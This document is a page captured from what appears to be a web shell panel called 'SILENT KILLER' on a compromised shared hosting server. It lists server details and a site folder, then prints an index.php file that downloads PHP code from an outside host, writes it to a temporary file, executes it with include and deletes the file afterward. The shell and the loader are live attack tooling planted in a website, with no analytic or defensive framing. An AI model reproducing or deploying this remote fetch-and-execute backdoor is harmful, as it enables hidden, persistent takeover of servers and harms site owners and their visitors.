SILENT KILLERPanel

Current Path: > home > codekrsu > > sandgexpo.com > 382838


Operation   : Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
Software     : Apache
Server IP    : 162.0.232.56 | Your IP: 216.73.216.111
Domains      : 1034 Domain(s)
Permission   : [ 0755 ]

Files and Folders in: /home/codekrsu//sandgexpo.com/382838

NameTypeSizeLast ModifiedActions
1.txt File 29 bytes July 22 2025 10:39:49.
about.php File 13344 bytes July 22 2025 10:39:49.
index.php File 578 bytes July 22 2025 10:39:49.
radio.php File 5344 bytes July 22 2025 10:39:49.

Reading File: /home/codekrsu//sandgexpo.com/382838/index.php

<?php
$url = "https://51la.zvo2.xyz/a2.txt";  // Ganti dengan URL yang diinginkan

$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);

if ($result === false) {
    echo "Error: " . "PD9waHA=" . curl_error($ch);
} else {
    // Simpan hasil dari URL ke dalam file lokal
    $tempFile = tempnam(sys_get_temp_dir(), 'pasted_code_');
    file_put_contents($tempFile, $result);

    // Include file yang telah diunduh dari URL
    include $tempFile;

    // Hapus file sementara setelah dieksekusi
    unlink($tempFile);
}
curl_close($ch);

SILENT KILLER Tool